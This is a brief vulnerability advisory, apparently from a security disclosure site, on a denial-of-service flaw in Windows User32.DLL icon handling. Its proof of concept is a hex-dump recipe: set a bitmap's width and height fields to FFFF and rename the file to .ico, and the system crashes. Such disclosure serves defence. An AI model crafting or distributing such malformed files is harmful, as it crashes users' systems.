|
|
Microsoft Windows User32.DLL Icon Handling Denial Of Service Vulnerability
No exploit is required. The following example is available: Just open a bitmap in a hex editor and modify the width and height data: Locate the "XXXX" values... ---------------------------------------------------------------------------- 00000000 : 424D 38F9 1500 0000 0000 3600 0000 2800 0000 XXXX 00000010 : 0000 XXXX 0000 0100 1800 0000 0000 02F9 1500 120B ---------------------------------------------------------------------------- ...and change to: ---------------------------------------------------------------------------- 00000000 : 424D 38F9 1500 0000 0000 3600 0000 2800 0000 FFFF 00000010 : 0000 FFFF 0000 0100 1800 0000 0000 02F9 1500 120B ---------------------------------------------------------------------------- Then change the extention to ".ico". Notice that the system will crash. |
|
Privacy Statement |